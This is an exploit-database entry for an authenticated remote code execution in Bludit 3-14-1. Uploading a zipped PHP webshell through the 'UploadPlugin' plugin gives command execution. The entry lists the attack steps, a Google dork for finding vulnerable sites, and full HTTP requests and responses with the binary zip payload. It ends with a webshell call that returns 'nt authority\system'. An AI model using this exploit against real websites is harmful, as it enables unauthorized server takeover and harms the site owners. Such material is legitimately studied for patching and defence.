Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)



EKU-ID: 55054 CVE: OSVDB-ID:
Author: Alperen Ergel Published: 2023-03-31 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
#  Step 1 : Archive as a zip your webshell (example: payload.zip)
#  Step 2 : Login admin account and download 'UploadPlugin'
#  Step 3 : Go to UploadPlugin section
#  Step 4 : Upload your zip
#  Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########


==============> START REQUEST <========================================

POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"

b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"

plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip

PK    唀圲               a/PK   攆圲	)  
      a/a.php鞻蹘0}+La B垤V軚p乆J @V旰!祪硪r鹷l7$mQy鄳<$╃烫93愀萞兯凤栿=/.爌葶Z+M5/暥B稳0>㎝哰j艂覤,匁tO踏覝.
4;拞e)▋既讛9[Z鹌	剬&耫<骮+淣棐y剂
RL蒃(7鈣怿嘷ユ3O喝'x>Ap俻鈔零る雷e&滭恔$豭必F呩@\@猤xD⑻'濁翩Q?絭鯣7鵝g轳聃
j眜
\鮿眴/锞无醋T橦腪ujHk獕龋g雅,C脐RVj5y%}q机瓌(嶲K*"诛。;椧卜6z瞆焔X黍砟'嶉+裉%
礿,袖郚谤f,_8棑嫊[硺lOScsmI珖H化*Sc?i)i勾&x@.'<棨坨]zs^a)hBz0;f r靿0y誙"照I	I豛搕{c髜J*洳 主悮;d脸赓lh喕s%	8N+珆+幁a簉灍煘侣j.
顅WS睞縊?nH丱?沯濷 悿茫Q+殳骓^ 
e8*跃"@2+肼`嶗
kC57j'"m
 惝ho x燈 ;挏c鐉貿
穂k艨莜-2靱撴v━C顟T#k2,U豐帵瓉O罶Xg槀鶮 啙Q堒	I喜蛑`:%F$A"t;buOMr4蓁~e阄欏豖砬m(s 6A3,l>簠<Nq{s __~t聧6峋,吪桤O辞谱脖b脩趻慤g[;pq沞榆咆镴
藑濌v䟞# 奜祍萇bh憋盁d椝吂>yMr鲡罶z鲦趺茺)}筻e簈QRrf}觋_D 0靧掯v'?@ 犒O鎕'極8f梺D5[嗖=b~PK?    唀圲             $       鞟    a/
          䴕,
 䴕,
j.
PK?   攆圲	)  
    $            a/a.php
          -
 鳚C-
 bj.
PK         
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"

Upload
-----------------------------308003478615795926433430552264--


==============> END REQUEST <========================================

## WEB SHELL UPLOADED!

==============> START RESPONSE <========================================

HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.

==============> END RESPONSE <========================================

# REQUEST THE WEB SHELL

==============> START REQUEST <========================================

GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

==============> END REQUEST <========================================

==============> START RESPONSE <========================================

HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32

<pre>nt authority\system
</pre>

==============> END RESPONSE <========================================